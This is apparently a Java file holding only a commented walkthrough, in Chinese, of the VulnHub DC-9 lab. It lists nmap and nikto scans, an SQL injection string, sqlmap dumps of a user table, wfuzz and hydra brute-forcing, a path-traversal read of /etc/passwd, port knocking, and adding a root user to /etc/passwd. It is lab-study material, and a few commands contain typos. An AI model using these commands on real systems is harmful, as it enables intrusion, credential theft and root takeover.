package com.asa.hack;

public class C {
	
	/**
	 * vulnhub.com/entry/dc-9,412/
	 * 
	 * 1、SQL注入获得管理员密码
		2、本地文件包含漏洞
		3、fuzz爆破web密码
		4、knockd敲门]服务
		5、Hydra暴破SSH密码
		6、/etc/passwd添加用户提权

	 * 
	 * nmap -sP 192.168.2.1/24
	 * nmap -sC -sV -oA dc-9 192.168.2.120		端口扫描
	 * 
	 * nikto -host 192.168.2.120:8888		文件扫描
	 * 
	 * 
	 * 
	 * sql注入
	 * 'or 1=1 --+
	 * 
	 * 
	 * 
	 * sqlmap -u "http://192.168.142.139/results.php" --data "search=1"		查看接口是否存在sql注入问题
	 * 
	 * 
	 * sqlmap -u "http://192.168.142.139/results.php" --data "search=1" --current-db	查询当前用的哪个数据库
	 * 
	 * 
	 * sqlmap -u "http://192.168.142.139/results.php" --data "search=1" --dbs	查看总共有哪些数据库
	 * 
	 * 
	 * sqlmap -u "http://192.168.142.139/results.php" --data "search=1" -D users --tables 	查看指定的数据库有哪些表
	 * 
	 * 
	 * sqlmap -u "http://192.168.142.139/results.php" --data "search=1" -D users -T UserDetails --dump 指定数据库和表 ，并导出来
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 使用fuzz爆破密码
	 *  wfuzz -z_ file,user-dict -z file,pass-dict "http://192.168.142. 139/manage.php?username=FUZZ&password=FUZ2Z "
	 * 
	 * wfuzz -z_ file,user-dict -z file,pass-dict --hw 87 "http://192.168.142. 139/manage.php?username=FUZZ&password=FUZ2Z "	这个是把包含87的过滤了
	 * 
	 * 
	 * wfuzz -b 'PHPSESSID=fgqd23ebeum4v0n1hmvufivh06' -W /usr/share/wfuzz/wordlist/general/common.txt http://192.168.142.139/manage.php?FUZZ=index.php

	 * 
	 * 192.168.142.139/manage.php？file=../../../../../../../../etc/passed		这算是php的一个漏洞

	 * 
	 * 
	 * 
	 * hydra暴力破解工具
	 * hydra -L user-dict -P pass-dict 192.168.142.139 ssh
	 * 
	 * 22端口扫描是开放的，但还是不能连接，为什么呢？
 			knockd服务，可能它拦截了（一种可能）
 			ect/knockd.conf
 			可以发现这个配置中有你需要先连的端口
 			
	 * 
	 * 
	 * 
	 * 
	 * nmap -p 7469 192.168.142.139	用nmap来连接端口，敲门，只有先敲门，才能打开22端口
	 * hydra -L user-dict -P pass-dict 192.168.142.139 ssh			pass-dict这个是你认为的密码文件
	 * 
	 * 
	 * find / -name "test.py" 2>/dev/null 					查找文件，2>/dev/null把错误的信息就不要输出出来
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * openssl passwd -1 -salt admin 123456
	 * 
	 * echo 'admin:$1$admin$LCIYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> 设置密码
	 * 
	 * 
	 * cat /etc/passwd	这个文件放登录信息的，可以通过修改它来注入登录用户
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 */
	
	
	

}
